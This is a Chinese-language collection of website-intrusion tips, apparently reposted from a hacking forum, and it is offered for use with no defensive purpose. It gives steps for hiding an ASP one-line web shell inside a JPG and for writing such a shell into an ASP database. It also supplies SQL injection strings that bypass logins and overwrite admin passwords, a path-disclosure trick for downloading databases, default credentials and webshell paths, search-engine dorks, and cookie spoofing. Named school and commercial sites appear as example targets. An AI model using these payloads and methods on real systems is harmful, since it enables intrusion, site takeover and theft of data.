建个asp文件内容为<!--# file="ating.jpg"-->
找个正常图片ating.jpg插入句话木马(比如冰狐),用ultraedit进行hex编译插入图片里为了运行成功还要搜索<%和%>,将其变为00,(不要替换自己asp),再把jpg文件开头加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(‘#’)+’’) </SCRIPT>
2. 名称:整蛊 最后附上 卡拉是条ok 整理总结
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传文件 [重新上传]或者出现“请登陆后使用”80%就有漏洞了!
有时上传不定会成功,这是Cookies不样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]
3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固无懈可击我们可以找下和这个站同服务器站点然后在利用这个站点用提权嗅探等思路方法来入侵我们 要入侵站点在这里有个难点就是些服务器绝对路径经过加密这就看我们本事了
4.暴库:把 2级目录中间/换成%5c
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1
如果你能看到:'E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa'不是个有效路径 确定路径名称拼写是否正确以及是否 连接到文件存放服务器
这样就是数据库了下载时用FLASHGET换成.MDB格式就行.
5.'or'='or'这是个可以连接SQL语名句.可以直接进入后台我收集了下类似还有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社会工程学这个我们都知道吧就是猜解
EY:http://www.neu.edu.cn/waishi/admin
admin waishi
7.写入ASP格式数据库就是句话木马[<%execute request("value")%> ]常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式数据库]再写入句话木马
8.源码利用:些网站WebSite用都是网上下载源码.有站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用是:杰出校友录源码我下过了
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样网站WebSite很多/利人别人WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站WebSite猎手 挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人些网站WebSite可以断开目录可以方问目录
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库下载不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种思路方法可以取得大量WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站WebSite管理后台地址:
site:xxxx.comext:管理
site:xxxx.comitle:管理 <关键字很多自已找>
site:xxxx.cominurl:login
(3).查找access数据库,mssql、mysql连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了自已做做吧
13.COOKIE欺骗:把自己ID修改成管理员MD5密码也修改成他用桂林老兵工具可以修改COOKIE这个我就不多讲了
14.利用常见漏洞:如动网BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs权限提升工具使自已成为前台管理员
THEN运用:动网固顶贴工具找个固顶贴再取得COOKIES这个要你自已做我们可以用WSockExpert取得Cookies/NC包
这个我就不做了网上教程多是自已下个看看
工具:dvbbs权限提升工具 动网固顶贴工具
15.还有些老漏洞如IIS34查看源码5DELETE
CGIPHP些老洞我就不说了啊太老了没有什么大用途
最新评论